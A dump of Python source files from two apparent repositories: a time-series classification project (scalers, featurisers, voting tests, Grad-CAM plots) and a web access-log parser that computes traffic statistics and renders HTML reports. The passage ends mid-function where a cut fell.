(one of 'constant', or 'time-varying') mu : float (default: 0.) Mean of the output time series. std : float (default: 1.) Standard deviation of the output time series. """ def __init__(self, kind='constant', mu=0., std=1.): assert kind in ['time-varying', 'constant'],\ 'axis should be one of time-varying or constant' self._axis = (1, 0) if kind == 'constant' else 0 self.mu_ = mu self.std_ = std def fit(self, X, y=None, **kwargs): X_ = to_time_series_dataset(X) self.mean_t = np.mean(X_, axis=self._axis) self.std_t = np.std(X_, axis=self._axis) self.std_t[self.std_t == 0.] = 1. return self def transform(self, X, **kwargs): """Fit to data, then transform it. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Rescaled time series dataset """ X_ = to_time_series_dataset(X) X_ = (X_ - self.mean_t) * self.std_ / self.std_t + self.mu_ return X_ class Flattener(TransformerMixin): """Flattener for time series. Reduces the dataset by one dimension by flattening the channels""" def __init__(self): pass def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Flattened time series dataset """ X_ = X.transpose(0, 2, 1).reshape(X.shape[0],-1) return X_ class Differentiator(TransformerMixin): """Calculates the derivative of a specified channel and and appends it as new channel""" def __init__(self, channel): """Initialise Featuriser. Parameters ---------- channel int, channel to calculate derivative from """ self.channel = channel def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset Returns ------- numpy.ndarray Time series dataset with new channel """ dt = np.diff(X[:, :, self.channel], axis=1, prepend=X[0, 0, self.channel]) X = np.concatenate((X, np.expand_dims(dt, axis=2)), axis=2) return X class Featuriser(TransformerMixin, BaseEstimator): """Featuriser for time series. Calculates a set of statistical measures on each channel and each defined window of the dataset and returns a flattened matrix to train sklearn models on""" def __init__(self, windows=1): """Initialise Featuriser. Parameters ---------- windows int, number of windows to part the time series in """ self.windows = windows def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Featurised time series dataset """ X_ = np.empty((X.shape[0], 0)) for i in range(X.shape[2]): for window in np.array_split(X[:, :, i], self.windows, axis=1): mean = np.mean(window, axis=1) std = np.std(window, axis=1) min_d = np.min(window, axis=1) min_loc = np.argmin(window, axis=1) max_d = np.max(window, axis=1) max_loc = np.argmax(window, axis=1) # Concatenate all values to a numpy array row = [mean, std, min_d, min_loc, max_d, max_loc] row = np.transpose(np.vstack(row)) X_ = np.hstack([X_, row]) return X_ class Featuriser2(TransformerMixin): """Deprecated. Featuriser for time series. Calculates a set of statistical measures on each channel of the dataset and returns a flattened matrix to train sklearn models on""" def __init__(self): pass def fit(self,X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- numpy.ndarray Featurised time series dataset """ X_ = np.empty((X.shape[0], 0)) for i in range(X.shape[2]): table = np.empty((0, 14)) for x in X[:, :, i]: mean = np.mean(x) var = np.var(x) max_d = x.max() max_loc = np.argmax(x) min_d = x.min() min_loc = np.argmin(x) range_d = max_d - min_d med = np.median(x) first = x[0] last = x[-1] skew_d = skew(x) kurt = kurtosis(x) sum = np.sum(x) mean_abs_change = np.mean(np.abs(np.diff(x))) # Concatenate all values to a numpy array row = [mean, var, med, first, last, range_d, min_d, min_loc, max_d, max_loc, skew_d, kurt, sum, mean_abs_change] row = np.hstack(row) table = np.vstack([table, row]) X_ = np.hstack((X_,table)) return X_ class Cutter(TransformerMixin): """Cuts the last part of the curves.""" def fit(self, X, y=None, **kwargs): return self def transform(self, X, **kwargs): """Transform data. Parameters ---------- X Time series dataset to be rescaled Returns ------- list Cut time series dataset """ res = [] for x in X: idx = np.argmax(np.array(x)[:, 0]) res.append(x[:idx]) return res def plot_dtc(dtc): feature_names = [] #channels = ["$pos","$vel","$cur"] # test case #channels = ["$pos","$cur"] # use case 1 #channels = ["$pos","$cur","$vel"] # use case 1 with derived velocity channels = ["$pos","$for"] # use case 2 for var in channels: for i in range(1,int((dtc.n_features_/6/len(channels))+1)): for f in ["{mean}$","{std}$","{min}$","{min-ind}$","{max}$","{max-ind}$"]: feature_names.append('{0}^{1}_{2}'.format(var,i,f)) #target_names = ["0","1","2","3","4"] # test case target_names = ["0","1","2","3"] # use case 1 + 2 dot_data = tree.export_graphviz(dtc, out_file=None, feature_names=feature_names, class_names=target_names, filled=False, rounded=True, special_characters=True) graph = graphviz.Source(dot_data) graph.format = 'svg' graph.render("models\\dtc")
Python
444
30.774775
111
/src/utils.py
0.548341
0.540261
sebastianden/alpaca
refs/heads/master
from alpaca import Alpaca from utils import load_test, split_df, TimeSeriesResampler,confusion_matrix import time from sklearn.model_selection import train_test_split from sklearn.utils import shuffle from sklearn.pipeline import Pipeline import numpy as np import pandas as pd if __name__ == '__main__': X, y = load_test() # Length of timeseries for resampler and cnn sz = 230 # Number of channels for cnn num_channels = X.shape[-1] # Number of classes for cnn num_classes = np.unique(y).shape[0] classes = np.array(["0", "1", "2", "3", "4", "?"]) repetitions = 1 results = [] outliers = np.empty((0, 230*3+5)) for r in range(repetitions): print("Repetition #",r) X, y = shuffle(X, y, random_state=r) # Turn y to numpy array y = np.array(y) # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) for votingstr in ["democratic", "veto", "stacked_svc", "stacked_dtc"]: if votingstr == 'stacked_svc': meta = 'svc' elif votingstr == 'stacked_dtc': meta = 'dtc' if votingstr == 'stacked_svc' or votingstr == 'stacked_dtc': voting = 'stacked' stacked = True else: stacked = False voting = votingstr meta = None # Build pipeline from resampler and estimator resampler = TimeSeriesResampler(sz=sz) alpaca = Pipeline([('resampler', resampler), ('classifier', Alpaca())]) alpaca.fit(X_train, y_train, classifier__stacked=stacked, classifier__n_clusters=100) y_pred_bin, y_pred = alpaca.predict(X_test, voting=voting) # Plot confusion matrix (Binary) y_test_bin = np.copy(y_test) y_test_bin[y_test_bin > 0] = 1 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() # Append overall error results.append([votingstr, r, 'err', (fp+fn)/(tn+fp+fn+tp)]) # Append false negative rate results.append([votingstr, r, 'fnr', fn/(fn+tp)]) # Append false positive rate results.append([votingstr, r, 'fpr', fp/(fp+tn)]) # Save misclassified samples (with y_pred,y_pred_bin, y_true, and voting scheme) idx = np.where(y_test_bin != y_pred_bin) # Flattened curves curves = X_test[idx].transpose(0, 2, 1).reshape(X_test[idx].shape[0],-1) vote_type = np.array([votingstr for i in range(idx[0].shape[0])]).reshape((-1,1)) wrong = np.hstack([curves, y_pred[idx].reshape((-1,1)),y_test[idx].reshape((-1,1)), y_pred_bin[idx].reshape((-1,1)),y_test_bin[idx].reshape((-1,1)), vote_type]) outliers = np.vstack((outliers,wrong)) df = pd.DataFrame(outliers) df.to_csv("..\\results\\OutliersVotingTest.csv") df = pd.DataFrame(results, columns=['voting', 'test', 'metric', 'value']) df.to_csv("..\\results\\VotingTest.csv")
Python
87
35.793102
108
/src/test_voting.py
0.561037
0.548236
sebastianden/alpaca
refs/heads/master
import pandas as pd import numpy as np from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm def univariant(df, param, quantity='mean_test_score'): unique = df[param].unique() scores = [] for i in unique: scores.append(df[df[param] == i][quantity].mean()) plt.plot(unique, scores) plt.show() def multivariant(df, param1, param2,quantity='mean_test_score'): unique1 = df[param1].unique() unique2 = df[param2].unique() unique1, unique2 = np.meshgrid(unique1, unique2) scores = np.zeros(unique1.shape) for i, p1 in enumerate(unique1[0]): for j, p2 in enumerate(unique2[0]): scores[i, j] = df[(df[param1] == p1) & (df[param2] == p2)][quantity].values.mean() fig = plt.figure() ax = fig.gca(projection='3d') surf = ax.plot_surface(unique1, unique2, scores, cmap=cm.coolwarm, linewidth=0, antialiased=False) ax.set_xlabel(param1) ax.set_ylabel(param2) ax.set_zlabel("Accuracy") plt.show() df = pd.read_csv("..\\results\\cnn.csv") univariant(df, param='param_cnn__len_filter',quantity='mean_score_time')
Python
39
28.410257
102
/src/gridsearch_results.py
0.657068
0.631763
sebastianden/alpaca
refs/heads/master
import tensorflow.keras.backend as K import tensorflow.keras from tensorflow.keras.layers import Lambda from tensorflow.keras.models import Model, load_model tensorflow.compat.v1.disable_eager_execution() import tensorflow as tf import pandas as pd import numpy as np import matplotlib.pyplot as plt from utils import to_time_series_dataset, split_df, load_test, TimeSeriesResampler, TimeSeriesScalerMeanVariance from scipy.interpolate import interp1d import seaborn as sns sns.set(style='white',font='Palatino Linotype',font_scale=1,rc={'axes.grid' : False}) def get_model(id): model = load_model('.\\models\\cam_cnn_'+id+'.h5') return model def target_category_loss(x, category_index, nb_classes): return tf.multiply(x, K.one_hot([category_index], nb_classes)) def target_category_loss_output_shape(input_shape): return input_shape def normalize(x): # utility function to normalize a tensor by its L2 norm return x / (K.sqrt(K.mean(K.square(x))) + 1e-5) def load_data(dataset): if dataset == 'test': X, y = load_test() sz = 230 elif dataset == 'uc1': X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), index_column='run_id', feature_columns=['fldPosition', 'fldCurrent'], target_name='target') # Length of timeseries for resampler and cnn sz = 38 elif dataset == 'uc2': X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), index_column='run_id', feature_columns=['position', 'force'], target_name='label') # Length of timeseries for resampler and cnn sz = 200 resampler = TimeSeriesResampler(sz=sz) X = resampler.fit_transform(X, y) y = np.array(y) return X, y def get_sample(X, y, label, rs=100): s = np.random.RandomState(rs) s = s.choice(np.where(y == label)[0], 1) x_raw = to_time_series_dataset(X[s, :, :]) scaler = TimeSeriesScalerMeanVariance(kind='constant') X = scaler.fit_transform(X) x_proc = to_time_series_dataset(X[s, :, :]) return x_proc, x_raw def _compute_gradients(tensor, var_list): grads = tf.gradients(tensor, var_list) return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)] def grad_cam(input_model, data, category_index, nb_classes, layer_name): # Lambda function for getting target category loss target_layer = lambda x: target_category_loss(x, category_index, nb_classes) # Lambda layer for function x = Lambda(target_layer, output_shape = target_category_loss_output_shape)(input_model.output) # Add Lambda layer as output to model model = Model(inputs=input_model.input, outputs=x) #model.summary() # Function for getting target category loss y^c loss = K.sum(model.output) # Get the layer with "layer_name" as name conv_output = [l for l in model.layers if l.name == layer_name][0].output # Define function to calculate gradients grads = normalize(_compute_gradients(loss, [conv_output])[0]) gradient_function = K.function([model.input], [conv_output, grads]) # Calculate convolution layer output and gradients for datasample output, grads_val = gradient_function([data]) output, grads_val = output[0, :], grads_val[0, :, :] # Calculate the neuron importance weights as mean of gradients weights = np.mean(grads_val, axis = 0) # Calculate CAM by multiplying weights with the respective output cam = np.zeros(output.shape[0:1], dtype = np.float32) for i, w in enumerate(weights): cam += w * output[:, i] # Interpolate CAM to get it back to the original data resolution f = interp1d(np.linspace(0, 1, cam.shape[0]), cam, kind="slinear") cam = f(np.linspace(0,1,data.shape[1])) # Apply ReLU function to only get positive values cam[cam < 0] = 0 return cam def plot_grad_cam(cam, raw_input, cmap, alpha, language='eng'): fig, ax = plt.subplots(raw_input.shape[-1], 1, figsize=(15, 9), sharex=True) # fig.suptitle('Gradient Class Activation Map for sample of class %d' %predicted_class) if language == 'eng': ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Velocity $\mathit{v}$ in m/s", r"Current $\mathit{I}$ in A"] if language == 'ger': ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Geschwindigkeit $\mathit{v}$ in m/s", r"Stromstärke $\mathit{I}$ in A"] for i, a in enumerate(ax): left, right = (-1, raw_input.shape[1] + 1) range_input = raw_input[:, :, i].max() - raw_input[:, :, i].min() down, up = (raw_input[:, :, i].min() - 0.1 * range_input, raw_input[:, :, i].max() + 0.1 * range_input) a.set_xlim(left, right) a.set_ylim(down, up) a.set_ylabel(ax_ylabel[i]) im = a.imshow(cam.reshape(1, -1), extent=[left, right, down, up], aspect='auto', alpha=alpha, cmap=cmap) a.plot(raw_input[0, :, i], linewidth=2, color='k') fig.subplots_adjust(right=0.8) cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7]) cbar = fig.colorbar(im, cax=cbar_ax) if language == 'eng': cbar_ax.set_ylabel('Activation', rotation=90, labelpad=15) if language == 'ger': cbar_ax.set_ylabel('Aktivierung', rotation=90, labelpad=15) return ax if __name__ == "__main__": X, y = load_data('test') nb_classes = np.unique(y).shape[0] # Load model and datasample preprocessed_input, raw_input = get_sample(X, y, label=1) model = get_model('test') # Get prediction predictions = model.predict(preprocessed_input) predicted_class = np.argmax(predictions) print('Predicted class: ', predicted_class) # Calculate Class Activation Map cam = grad_cam(model, preprocessed_input, predicted_class, nb_classes, 'block2_conv1') ax = plot_grad_cam(cam, raw_input, 'jet', 1) plt.show()
Python
152
38.144737
126
/src/cam.py
0.637372
0.623257
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import os import re import json import time import traceback import datetime from collections import Counter from numpy import var, average, percentile from bin.util import get_dir_files from bin.config import config from bin.report import generate_web_log_parser_report from bin.report import generate_web_log_parser_urls from bin.report import update_index_html class URLData: def __init__(self, url=None, pv=None, ratio=None, peak=None): self.url = url self.pv = pv self.ratio = ratio self.peak = peak self.time = [] self.cost = [] self.cost_time = {'p9': None, 'p8': None, 'p5': None, 'avg': None, 'variance': None} def get_data(self): return {'url': self.url, 'pv': self.pv, 'ratio': self.ratio, 'peak': self.peak, 'cost_time': self.cost_time} def parse_log_format(): log_format_index = {} log_format_list = config.log_format.split() for item in log_format_list: if item == 'ip': log_format_index.setdefault('ip_index', log_format_list.index(item) + 1) if item == 'real_ip': log_format_index.setdefault('real_ip_index', log_format_list.index(item) + 1) if item == 'datetime': log_format_index.setdefault('time_index', log_format_list.index(item) + 1) if item == 'url': log_format_index.setdefault('url_index', log_format_list.index(item) + 1) if item == 'method': log_format_index.setdefault('method_index', log_format_list.index(item) + 1) if item == 'protocol': log_format_index.setdefault('protocol_index', log_format_list.index(item) + 1) if item == 'cost': log_format_index.setdefault('cost_time_index', log_format_list.index(item) + 1) if item == 'status': log_format_index.setdefault('status', log_format_list.index(item) + 1) if 'real_ip_index' in log_format_index.keys(): log_format_index.setdefault('host_index', log_format_list.index('real_ip') + 1) else: log_format_index.setdefault('host_index', log_format_list.index('ip') + 1) return log_format_index def not_static_file(url): url_front = url.split('?')[0] if url_front.split('.')[-1] not in config.static_file: return True else: return False def is_ignore_url(url): url_front = url.split('?')[0] if url_front not in config.ignore_urls: return False else: return True def get_new_url_with_parameters(origin_url): origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: return origin_url url_front = origin_url_list[0] url_parameters = sorted(origin_url_list[1].split('&')) new_url_parameters = [] for parameter in url_parameters: parameter_list = parameter.split('=') key = parameter_list[0] if len(parameter_list) == 1: new_url_parameters.append(parameter) elif key in config.custom_keys: new_url_parameters.append(key + '=' + config.custom_parameters.get(key)) elif key in config.fixed_parameter_keys: new_url_parameters.append(parameter) else: new_url_parameters.append(key + '=' + '{' + key + '}') new_url = url_front + '?' + '&amp;'.join(new_url_parameters) return new_url def get_new_url_for_always_parameters(origin_url): origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: return origin_url_list[0] url_front = origin_url_list[0] url_parameters = sorted(origin_url_list[1].split('&')) new_url_parameters = [] for parameter in url_parameters: key = parameter.split('=')[0] if key in config.always_parameter_keys: new_url_parameters.append(parameter) if new_url_parameters: new_url = url_front + '?' + '&amp;'.join(new_url_parameters) else: new_url = url_front return new_url def ignore_url_suffix(origin_url): # origin_url = str(origin_url, encoding="utf-8") origin_url_list = origin_url.split('?') if len(origin_url_list) == 1: uri_parameter = None else: uri_parameter = origin_url_list[1:] uri = origin_url_list[0] new_uri = uri for suffix in config.ignore_url_suffix: if uri.endswith(suffix): new_uri = uri.replace(suffix, '') break if uri_parameter: return new_uri + '?' + '?'.join(uri_parameter) else: return new_uri def get_url(match, log_format): origin_url = ignore_url_suffix(match.group(log_format.get('url_index'))) if config.is_with_parameters: url = get_new_url_with_parameters(origin_url) else: if config.always_parameter_keys: url = get_new_url_for_always_parameters(origin_url) else: url = match.group(origin_url.split('?')[0].split('.json')[0]) return url def parse_log_file(target_file, log_format): # 用户IP hosts = [] # 访问时间 times = [] # 访问时间中的小时 hours = [] # 访问时间中的分钟 minutes = [] # 请求URL urls = [] # 请求响应时间 cost_time_list = [] cost_time_flag = False cost_time_percentile_flag = False if 'cost_time_index' in log_format.keys(): if config.cost_time_flag: cost_time_flag = True if config.cost_time_percentile_flag: cost_time_percentile_flag = True # 请求方法计数器 method_counts = {'post': 0, 'post_percentile': 0, 'get': 0, 'get_percentile': 0} # http status code统计 status_codes = {} pattern = re.compile(config.log_pattern) # pattern = re.compile(b'(.*?):.*?\[.*?\].*?\[(.*?)\]\s(.*?)\s(.*?)\s.*?msecs\s\((.*?)\s(.*?)\)') # 第一次读取整个文件,获取对应的请求时间、请求URL、请求方法、用户IP、请求响应时间等数据 with open('../data/' + target_file, 'rb') as f: for line in f: match = pattern.match(str(line,encoding="utf8")) if match is None: continue url = get_url(match, log_format) if is_ignore_url(url): continue match_method = match.group(log_format.get('method_index')) if match_method not in config.support_method: continue if not_static_file(url): hosts.append(match.group(log_format.get('host_index')).split(',')[0]) # log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.strptime(match.group(log_format.get('time_index')), # '%d/%b/%Y:%H:%M:%S')) log_time = match.group(log_format.get('time_index')) old_time_array = time.strptime(log_time, "%a %b %d %H:%M:%S %Y") log_time= time.strftime('%d/%b/%Y:%H:%M:%S', old_time_array) times.append(log_time) log_time_list = log_time.split(':') # hours.append(':'.join(log_time_list[0:2])) hours.append(':'.join(log_time_list[1:2])) # minutes.append(':'.join(log_time_list[0:3])) minutes.append(':'.join(log_time_list[2:3])) if match_method == 'POST': method_counts['post'] += 1 if match_method == 'GET': method_counts['get'] += 1 urls.append(match_method + ' ' + url) if 'cost_time_index' in log_format.keys(): request_cost_time = int(float(match.group(log_format.get('cost_time_index'))) * 1000) if cost_time_flag: cost_time_list.append({'time': log_time, 'cost_time': request_cost_time}) else: cost_time_list.append({'time': '', 'cost_time': request_cost_time}) if 'status' in log_format.keys(): status_code = int(match.group(log_format.get('status'))) if status_code in status_codes.keys(): status_codes[status_code] += 1 else: status_codes.setdefault(status_code, 1) if len(times) > 2: cross_time = datetime.datetime.strptime(times[-1], '%d/%b/%Y:%H:%M:%S') - datetime.datetime.strptime(times[0], '%d/%b/%Y:%H:%M:%S') else: cross_time = None # 计算PV、UV、平均请求数、GET/POST占比 pv = len(times) uv = len(set(hosts)) response_avg = int(pv / len(set(times))) method_counts['post_percentile'] = int(method_counts['post'] * 100 / pv) method_counts['get_percentile'] = int(method_counts['get'] * 100 / pv) # 获取每小时、每分钟、每秒的请求数量 hours_counter = Counter(hours) minutes_counter = Counter(minutes) times_counter = Counter(times) # 获取每秒最大请求数及其请求时间 response_most_common = times_counter.most_common(1)[0] response_peak = response_most_common[1] response_peak_time = response_most_common[0] # 根据不同URL的PV数量截取较多请求,后续只分析进去排名内的URL urls_counter = Counter(urls) urls_most_common = urls_counter.most_common(config.urls_most_number) # 计算请求占比 url_data_list = [] for_url_data_uri_index = [] for item in urls_most_common: if item[1] >= config.urls_pv_threshold: ratio = '%0.3f' % float(item[1] * 100 / float(pv)) url_data_list.append(URLData(url=item[0], pv=item[1], ratio=ratio)) for_url_data_uri_index.append(item[0]) continue if cross_time and cross_time.seconds < config.urls_pv_threshold_time and item[1] >= config.urls_pv_threshold_min: ratio = '%0.3f' % float(item[1] * 100 / float(pv)) url_data_list.append(URLData(url=item[0], pv=item[1], ratio=ratio)) for_url_data_uri_index.append(item[0]) continue # 第二次读取文件,以获取特定请求的访问时间及响应时间 with open('../data/' + target_file, 'rb') as f: for line in f: match = pattern.match(str(line,encoding="utf8")) if match is None: continue method = match.group(log_format.get('method_index')) url = get_url(match, log_format) target_url = ' '.join([method, url]) if target_url in for_url_data_uri_index: index = for_url_data_uri_index.index(target_url) url_data_list[index].time.append(match.group(log_format.get('time_index'))) if 'cost_time_index' in log_format.keys(): url_data_list[index].cost.append(float(match.group(log_format.get('cost_time_index')))) for url_data in url_data_list: # 计算每个特定请求的每秒最大并发 url_data.peak = Counter(url_data.time).most_common(1)[0][1] # 计算每个特定请求的耗时均值,中值,方差,百分位等 if url_data.cost: url_data.cost_time['avg'] = '%0.3f' % float(average(url_data.cost)) url_data.cost_time['variance'] = int(var(url_data.cost)) url_data.cost_time['p9'] = '%0.3f' % percentile(url_data.cost, 90) url_data.cost_time['p8'] = '%0.3f' % percentile(url_data.cost, 80) url_data.cost_time['p5'] = '%0.3f' % percentile(url_data.cost, 50) # 统计不同响应时间范围的请求数量 cost_time_range = {'r1': 0, 'r2': 0, 'r3': 0, 'r4': 0, 'r5': 0, 'r6': 0, 'r7': 0, 'r8': 0, 'r9': 0, 'r10': 0, 'r11': 0} for cost_time in cost_time_list: if cost_time['cost_time'] <= 50: cost_time_range['r1'] += 1 elif 50 < cost_time['cost_time'] <= 100: cost_time_range['r2'] += 1 elif 100 < cost_time['cost_time'] <= 150: cost_time_range['r3'] += 1 elif 150 < cost_time['cost_time'] <= 200: cost_time_range['r4'] += 1 elif 200 < cost_time['cost_time'] <= 250: cost_time_range['r5'] += 1 elif 250 < cost_time['cost_time'] <= 300: cost_time_range['r6'] += 1 elif 300 < cost_time['cost_time'] <= 350: cost_time_range['r7'] += 1 elif 350 < cost_time['cost_time'] <= 400: cost_time_range['r8'] += 1 elif 400 < cost_time['cost_time'] <= 450: cost_time_range['r9'] += 1 elif 450 < cost_time['cost_time'] <= 500: cost_time_range['r10'] += 1 else: cost_time_range['r11'] += 1 # 计算不同响应时间范围的请求占比 cost_time_range_percentile = {'r1p': 0, 'r2p': 0, 'r3p': 0, 'r4p': 0, 'r5p': 0, 'r6p': 0, 'r7p': 0, 'r8p': 0, 'r9p': 0, 'r10p': 0, 'r11p': 0} if cost_time_list: total_cost_time_pv = float(len(cost_time_list)) if cost_time_range['r1']: cost_time_range_percentile['r1p'] = '%0.3f' % float(cost_time_range['r1'] * 100 / total_cost_time_pv) if cost_time_range['r2']: cost_time_range_percentile['r2p'] = '%0.3f' % float(cost_time_range['r2'] * 100 / total_cost_time_pv) if cost_time_range['r3']: cost_time_range_percentile['r3p'] = '%0.3f' % float(cost_time_range['r3'] * 100 / total_cost_time_pv) if cost_time_range['r4']: cost_time_range_percentile['r4p'] = '%0.3f' % float(cost_time_range['r4'] * 100 / total_cost_time_pv) if cost_time_range['r5']: cost_time_range_percentile['r5p'] = '%0.3f' % float(cost_time_range['r5'] * 100 / total_cost_time_pv) if cost_time_range['r6']: cost_time_range_percentile['r6p'] = '%0.3f' % float(cost_time_range['r6'] * 100 / total_cost_time_pv) if cost_time_range['r7']: cost_time_range_percentile['r7p'] = '%0.3f' % float(cost_time_range['r7'] * 100 / total_cost_time_pv) if cost_time_range['r8']: cost_time_range_percentile['r8p'] = '%0.3f' % float(cost_time_range['r8'] * 100 / total_cost_time_pv) if cost_time_range['r9']: cost_time_range_percentile['r9p'] = '%0.3f' % float(cost_time_range['r9'] * 100 / total_cost_time_pv) if cost_time_range['r10']: cost_time_range_percentile['r10p'] = '%0.3f' % float(cost_time_range['r10'] * 100 / total_cost_time_pv) if cost_time_range['r11']: cost_time_range_percentile['r11p'] = '%0.3f' % float(cost_time_range['r11'] * 100 / total_cost_time_pv) total_data = {'pv': pv, 'uv': uv, 'response_avg': response_avg, 'response_peak': response_peak, 'response_peak_time': response_peak_time, 'url_data_list': url_data_list, 'source_file': target_file, 'hours_hits': hours_counter, 'minutes_hits': minutes_counter, 'second_hits': times_counter, 'cost_time_list': cost_time_list, 'cost_time_flag': cost_time_flag, 'cost_time_range_percentile': cost_time_range_percentile, 'method_counts': method_counts, 'cost_time_percentile_flag': cost_time_percentile_flag, 'cost_time_threshold': config.cost_time_threshold, 'cost_time_range': cost_time_range, 'status_codes': status_codes} generate_web_log_parser_report(total_data) def parse_log_file_with_goaccess(target_file): source_file = '../data/' + target_file goaccess_file = '../result/report/' + target_file + '_GoAccess.html' command = """ goaccess -f %(file)s -a -q \ --time-format=%(time_format)s \ --date-format=%(date_format)s \ --log-format='%(goaccess_log_format)s' \ --no-progress > %(goaccess_file)s""" \ % {'file': source_file, 'time_format': config.time_format, 'date_format': config.date_format, 'goaccess_log_format': config.goaccess_log_format, 'goaccess_file': goaccess_file} os.system(command) def main(): log_format = parse_log_format() result_files = [result_file.replace('.html', '') for result_file in get_dir_files('../result/report/')] target_files = sorted([data_file for data_file in get_dir_files('../data') if data_file not in result_files]) for target_file in target_files: try: print(datetime.datetime.now(), ' Start parse file : ' + target_file) parse_log_file(target_file, log_format) if config.goaccess_flag: parse_log_file_with_goaccess(target_file) print(datetime.datetime.now(), ' End parse file: ' + target_file) except Exception: exstr = traceback.format_exc() print(exstr) update_index_html() if __name__ == '__main__': main()
Python
399
40.107769
139
/web-log-parser/bin/start.py
0.561639
0.541519
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import configparser class Config: """get config from the ini file""" def __init__(self, config_file): all_config = configparser.RawConfigParser() with open(config_file, 'r',encoding="UTF-8") as cfg_file: all_config.readfp(cfg_file) self.log_format = all_config.get('format', 'log-format') self.log_pattern = all_config.get('format', 'log-pattern') self.support_method = all_config.get('filter', 'support_method').split(',') self.is_with_parameters = int(all_config.get('filter', 'is_with_parameters')) self.always_parameter_keys = all_config.get('filter', 'always_parameter_keys').split(',') self.urls_most_number = int(all_config.get('filter', 'urls_most_number')) self.urls_pv_threshold = int(all_config.get('filter', 'urls_pv_threshold')) self.urls_pv_threshold_time = int(all_config.get('filter', 'urls_pv_threshold_time')) self.urls_pv_threshold_min = int(all_config.get('filter', 'urls_pv_threshold_min')) self.ignore_url_suffix = all_config.get('filter', 'ignore_url_suffix').split(',') self.fixed_parameter_keys = all_config.get('filter', 'fixed_parameter_keys').split(',') self.custom_parameters_list = all_config.get('filter', 'custom_parameters').split(',') self.custom_keys = [] self.custom_parameters = {} for item in self.custom_parameters_list: key = item.split('=')[0] if len(item.split('=')) == 2: value = item.split('=')[1] else: value = '' self.custom_parameters.setdefault(key, value) self.custom_keys.append(key) self.ignore_urls = all_config.get('filter', 'ignore_urls').split(',') self.static_file = all_config.get('filter', 'static-file').split(',') self.second_line_flag = int(all_config.get('report', 'second_line_flag')) self.cost_time_flag = int(all_config.get('report', 'cost_time_flag')) self.cost_time_percentile_flag = int(all_config.get('report', 'cost_time_percentile_flag')) self.cost_time_threshold = all_config.get('report', 'cost_time_threshold') self.upload_flag = int(all_config.get('report', 'upload_flag')) self.upload_url = all_config.get('report', 'upload_url') self.goaccess_flag = int(all_config.get('goaccess', 'goaccess_flag')) self.time_format = all_config.get('goaccess', 'time-format') self.date_format = all_config.get('goaccess', 'date-format') self.goaccess_log_format = all_config.get('goaccess', 'goaccess-log-format') config = Config('../conf/config.ini')
Python
53
49.754719
99
/web-log-parser/bin/config.py
0.617472
0.615613
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import json import requests from util import get_dir_files from config import config from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('./templates')) report_template = env.get_template('report.html') index_template = env.get_template('index.html') url_template = env.get_template('url.html') def upload_report(data, hours_times, minutes_times): target_file = data['source_file'] pv = data['pv'] uv = data['uv'] get_count = data['method_counts']['get'] get_percent = data['method_counts']['get_percentile'] post_count = data['method_counts']['post'] post_percent = data['method_counts']['post_percentile'] response_peak = data['response_peak'] response_peak_time = data['response_peak_time'] response_avg = data['response_avg'] hours_times = hours_times hours_pv = data['hours_hits'] hours_most_common = data['hours_hits'].most_common(1)[0] hours_pv_peak = hours_most_common[1] hours_pv_peak_time = hours_most_common[0] minute_times = minutes_times minute_pv = data['minutes_hits'] minute_most_common = data['minutes_hits'].most_common(1)[0] minute_pv_peak = minute_most_common[1] minute_pv_peak_time = minute_most_common[0] cost_percent = data['cost_time_range_percentile'] cost_time_threshold = data['cost_time_threshold'] cost_range = data['cost_time_range'] url_data_list = [] for url_data in data['url_data_list']: url_data_list.append(url_data.get_data()) data = {'target_file': target_file, 'pv': pv, 'uv': uv, 'get_count': get_count, 'get_percent': get_percent, 'post_count': post_count, 'post_percent': post_percent, 'response_peak': response_peak, 'response_peak_time': response_peak_time, 'response_avg': response_avg, 'hours_times': hours_times, 'hours_pv': hours_pv, 'hours_pv_peak': hours_pv_peak, 'hours_pv_peak_time': hours_pv_peak_time, 'minute_times': minute_times, 'minute_pv': minute_pv, 'minute_pv_peak': minute_pv_peak, 'minute_pv_peak_time': minute_pv_peak_time, 'cost_percent': cost_percent, 'cost_percent_range': ['<50ms', '50~100ms', '100~150ms', '150~200ms', '200~250ms', '250~300ms', '300~350ms', '350~400ms', '400~450ms', '450~500ms', '>500ms'], 'cost_time_threshold': cost_time_threshold, 'url_data_list': url_data_list, 'cost_range': cost_range, 'status_codes': data['status_codes']} headers = {'Content-Type': 'application/json'} r = requests.post(config.upload_url, data=json.dumps(data), headers=headers) print(r.text) def generate_web_log_parser_report(data): if config.goaccess_flag: data.setdefault('goaccess_file', data.get('source_file') + '_GoAccess.html') data.setdefault('goaccess_title', u'查看GoAccess生成报告') else: data.setdefault('goaccess_file', '#') data.setdefault('goaccess_title', u'GoAccess报告已设置为无效,无法查看') hours_times = sorted(list(data.get('hours_hits'))) minutes_times = sorted(list(data.get('minutes_hits'))) seconds_times = sorted(list(data.get('second_hits'))) if config.upload_flag: upload_report(data, hours_times, minutes_times) html = report_template.render(data=data, web_log_urls_file=data.get('source_file') + '_urls.html', 